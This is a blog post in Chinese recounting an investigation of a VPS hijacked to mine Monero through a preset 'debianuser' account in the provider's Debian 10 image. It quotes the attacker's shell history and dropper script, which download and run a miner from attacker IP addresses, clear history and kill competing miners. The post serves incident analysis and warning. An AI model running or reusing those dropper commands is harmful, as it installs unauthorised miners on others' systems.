技术 · 2020年10月18日 5 515  

服务器被入侵的记录

服务器被入侵并用来挖矿的记录

今天我登录了一台绿云(Greencloudvps)的机器后,发现系统负载异常的高,top以看,排名第一的进程居然是 xmrig, 好家伙,几天没注意,这机器竟然被拿去挖矿(门罗币)了。

由于我设置的并不是弱密码,所以一开始我想到的是我的笔记本中了病毒,里面的ssh连接泄露了,于是我又去检查了其他的几台服务器,发现除了同属于绿云的另一台机器之外,其他的机器都是正常的,而这两台绿云的机器都因为挖矿进程跑满了CPU。

梳理一下,发现被入侵的两台机器都有以下特点:

  1. 都是绿云的机器
  2. 使用的都是他们提供的debian10镜像
  3. 挖矿进程的用户都是 debianuser

于是从这个用户入手,先检查 /etc/passwd/etc/shadow 文件。

[email protected]:~# cat /etc/passwd /etc/shadow | grep "debianuser"
debianuser:x:1000:1000:DebianUser,,,:/home/debianuser:/bin/bash
debianuser:$6$WFiwDS/pPh5PRyPr$wLFwNWzE1vkNWbm2h/qqhSStLdqr0czHNSW6GqnnF5hycGQ.AfFTvNoNfCqegPsjveARh6mITTsqNz9ClYY.b0:18550:0:99999:7:::

发现这个用户是UID GID都为1000的系统默认账户,并且居然还设置了初始密码(这个密码还不是用户设置的,一开始我压根就不知道这个账户的存在),相当于知道了密码就可以用这个账户登录了
再检查一下登录日志,在其中的一台服务器上:

[email protected]:~# cat /var/log/auth.log.1 | grep debianuser
Oct 11 19:18:49 Server sshd[20971]: Accepted password for debianuser from 45.148.10.65 port 52138 ssh2
Oct 11 19:18:49 Server sshd[20971]: pam_unix(sshd:session): session opened for user debianuser by (uid=0)
Oct 11 19:18:49 Server systemd-logind[242]: New session 128 of user debianuser.
Oct 11 19:18:50 Server systemd: pam_unix(systemd-user:session): session opened for user debianuser by (uid=0)
Oct 11 19:46:50 Server sshd[20971]: pam_unix(sshd:session): session closed for user debianuser
Binary file (standard input) matches

如果仅仅只是有一个用户不知道的设置了密码可以登陆的普通账户就算了,但是看登录日志,貌似有着更加麻烦的问题——黑客居然只用了一次就输对了密码?
查看另外一台机器,黑客也在几次尝试后就成功登陆了系统。 我高度怀疑他们的初始密码有者某种规律

然后看看我们的“debianuser”都做了些什么事情以及弄了些什么文件吧。

vim ~debianuser/.bash_history
top
pkill fri
cd /tmp; wget http://45.148.10.15/s.sh; curl -O http://45.148.10.15/s.sh; busybox http://45.148.10.15/s.sh; chmod 777 * s.sh; sh s.sh
passwd
ls
exit
ls
cd ~
ls
bash s.sh
ls
vim s.sh 
exit

[email protected]:/tmp# find / -user debianuser
/tmp/config.json
/tmp/fri
/home/debianuser
/home/debianuser/.profile
/home/debianuser/.bashrc
/home/debianuser/.bash_history
/home/debianuser/.bash_logout
/home/debianuser/s.sh
/home/debianuser/.config
/home/debianuser/.config/procps
/home/debianuser/.viminfo

可以看到这人下载了一个脚本,再修改后开始运行…
脚本内容如下

cd /tmp; wget http://45.148.10.186/fri;
wget http://45.148.10.186/config.json; 
curl -O http://45.148.10.186/fri; curl -O http://45.148.10.186/config.json; 
busybox wget http://45.148.10.186/config.json; 
busybox wget http://45.148.10.186/fri;
chmod 777 *;
./fri; rm -rf *;
rm config.json;
history -c; pkill xmrig;
pkill xmra64;
pkill rx64;
echo wedonehereboiz-allwgetz;

脚本很明确了…
不过我真的很好奇,他们到底是用了多弱的密码才能让别人那么快的破解出来。
昨晚和他们客服扯皮半天,他们先是说他们装的系统没这个用户(让他们来重装系统确实没这个用户),扯了半天后来发现控制面板装的debian10确实有这个问题,之后又硬是说这个solusvm的模板是没问题的,可能是我运行的脚本有问题…我也是服了,后来我在论坛发了一贴,发现不止是我,已经有好几个人的服务器被人拿来挖矿了,他们检查后发现也是这个“debianuser”在作祟,看来要是服务商继续不作为,到时候还有人要倒霉。(这次好在我发现及时,要是没发现这个问题,等到因为“长时间占用cpu”被删机的时候我怕还是一头雾水。
这次这个问题也再次让我领会到了网络是多么的险恶,一不小心就会给心怀不轨之人可乘之机。